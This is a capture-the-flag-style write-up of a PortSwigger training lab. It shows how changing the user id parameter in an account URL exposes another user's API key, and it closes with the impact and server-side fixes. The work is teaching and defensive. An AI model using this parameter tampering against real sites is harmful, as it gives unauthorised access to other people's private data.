🗂️PortSwigger Lab Writeup: User ID Controlled by Request Parameter
🎯 Objective
The objective of this lab is to exploit a broken access control where the app has a horizontal privilege escalation vulnerability on the user account page. The goal is to obtain the API key for the user carlos.
- Lab URL:
https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter - Category: Access Control
- Difficulty: Apprentice
🧪 Exploitation Steps
🕵️Step 1: Observe the Website
- Firstly open the lab URL in your browser, and observe what it is about and how it works.
- At first glance, the website seems to be a shopping website with a login page. In the lab description, it is mentioned that we need to obtain the API key for the user
carlos.
📝Step 2: Login as wiener
- Login with the credentials of user wiener to access the account page first.
- Now, On user account page
/my-account?id=wienerwe can see the API key of wiener. - Now, Change the
/my-account?id=wienerto/my-account?id=carlosto access the account page of carlos
- Hence, we can now see the API key of user carlos.
🧑💼Step 3: Submit API of carlos
- Copy the API key of carlos and submit it in Submit Solution.
- And Finally, the Lab is solved.
🧠 Conclusion
- This lab demonstrated horizontal privilege escalation through user ID parameter tampering. By changing
id=wienertoid=carlosin the URL, we accessed another user's sensitive account data without authorization. - The impact is high — attackers can enumerate and access any user's private data including API keys, email addresses, and other sensitive information by simply modifying request parameters.
- Fix: implement server-side authorization checks on every resource access, validate that the current user owns the requested resource, use cryptographically secure identifiers (UUIDs) instead of predictable IDs, and apply proper access control enforcement to all endpoints regardless of whether data appears sensitive.